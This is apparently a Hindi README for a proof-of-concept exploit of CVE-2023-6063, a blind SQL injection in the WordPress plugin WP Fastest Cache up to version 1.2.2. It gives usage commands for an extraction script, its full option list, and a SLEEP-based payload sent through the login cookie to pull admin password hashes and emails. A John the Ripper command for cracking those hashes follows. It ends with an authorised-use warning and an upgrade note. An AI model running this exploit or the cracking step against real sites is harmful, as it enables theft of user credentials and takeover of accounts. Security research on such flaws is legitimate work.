
CVE-2023-6063 के लिए एक प्रूफ ऑफ कॉन्सेप्ट, जो WP Fastest Cache ≤1.2.2 में एक समय-आधारित ब्लाइंड SQL इंजेक्शन कमजोरी है।
CVE-2023-6063 के लिए एक प्रूफ ऑफ कॉन्सेप्ट, WP Fastest Cache ≤1.2.2 में एक समय-आधारित ब्लाइंड SQL इंजेक्शन भेद्यता। wordpress_logged_in कुकी का दुरुपयोग करके wp_users तालिका से हैश किए गए पासवर्ड (user_pass) और ईमेल (user_email) निकालता है।
यह स्क्रिप्ट निकालता है:
निर्भरताएँ स्थापित करें (यदि स्थापित नहीं हैं):
pip install -r requirements.txt
मूल उपयोग:
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5
पूर्ण विकल्प:
-h, --help show this help message and exit
-u URL, --url URL Full URL to Wordpress for testing CVE-2023-6063
--username USERNAME Define a user to extract its hashed pass
-d DELAY, --delay DELAY
Time for wait web response default 5, minimum 2
-H HASH, --hash HASH Hash to verify against wp_users table, if the hash contains specials characters, please use single quotes -> '<hash>'
--domain DOMAIN Name of the domain for email validation
-c COOKIE, --cookie COOKIE
Specify a cookie name if it's different on your context
--status-code STATUS_CODE
Use a specific positive status code, default 200
--debug More verbosity
--just-hash Just extract hashed password
--just-email Just extract email value for a user
यह व्यवस्थापक उपयोगकर्ता के लिए एक डेमो है
https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890
जब हैश किए गए पासवर्ड लीक हो जाते हैं, तो यदि पासवर्ड असुरक्षित है तो इसे PHPass एल्गोरिदम से डिक्रिप्ट करने के लिए john या hashcat का उपयोग करें।
John उदाहरण:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass
WP Fastest Cache प्लगइन (≤1.2.2) WordPress के लिए wordpress_logged_in कुकी के माध्यम से एक अप्रमाणित ब्लाइंड SQL इंजेक्शन के लिए असुरक्षित है। हमलावर SQL क्वेरी में समय-आधारित विलंब (SLEEP()) का लाभ उठाकर wp_users तालिका से संवेदनशील डेटा (जैसे, पासवर्ड हैश, ईमेल पते) निकालने के लिए इस दोष का शोषण कर सकते हैं।
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -
🚨 चेतावनी: इस जानकारी का उपयोग केवल उचित प्राधिकरण के साथ नैतिक सुरक्षा परीक्षण के लिए करें। अनधिकृत शोषण अवैध है।
WP Fastest Cache को संस्करण >1.2.2 में अपग्रेड करें।